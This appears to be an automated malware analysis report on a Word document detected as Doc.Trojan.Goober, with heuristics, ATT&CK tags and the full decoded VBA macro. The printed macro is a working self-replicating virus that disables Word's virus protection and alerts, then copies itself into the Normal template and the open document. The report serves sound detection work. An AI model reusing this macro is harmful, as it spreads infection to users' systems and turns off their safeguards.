MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that is triggered by the Document_Open event. This macro writes its own code to a file named 'C:\G00ber.sys' and then attempts to modify the document content. The presence of the Document_Open macro and the ClamAV detections strongly indicate malicious intent, likely delivered as a spearphishing attachment.
Heuristics 3
-
ClamAV: Doc.Trojan.Goober-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Goober-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7440 bytes |
SHA-256: d88b1bd479d3d7c82b98b1ab35d4e2cbde6dd479e7ea4f0291f1e7f1d6a1ab51 |
|||
|
Detection
ClamAV:
Doc.Trojan.Goober-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Type Punkt
xAchse As Long
yAchse As Long
End Type
Private Sub document_Open(): On Error Resume Next:
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Options.ConfirmConversions = (0 - 0)
Options.SaveNormalPrompt = (1 - 1)
Options.VirusProtection = (2 - 2)
Open "C:\G00ber.sys" For Output As #1: Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines): Close #1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.SaveAs FileName = ActiveDocument.FullName
Set myRange = ActiveDocument.Range(Start:=0, End:=0)
With myRange.Find
.ClearFormatting
.Text = "ShiThe!"
With .Replacement
.ClearFormatting
.Text = "The"
End With
.Execute Replace:=wdReplaceAll, Format:=True, MatchCase:=True, _
MatchWholeWord:=True
End With
With myRange.Find
.ClearFormatting
.Text = "shithe!"
With .Replacement
.ClearFormatting
.Text = "the"
End With
.Execute Replace:=wdReplaceAll, Format:=True, MatchCase:=True, _
MatchWholeWord:=True
End With
End Sub
Private Sub document_New(): On Error Resume Next:
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Options.ConfirmConversions = (0 - 0)
Options.SaveNormalPrompt = (1 - 1)
Options.VirusProtection = (2 - 2)
Open "C:\G00ber.sys" For Output As #1: Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines): Close #1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\G00ber.sys"): ActiveDocument.SaveAs FileName = ActiveDocument.FullName
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.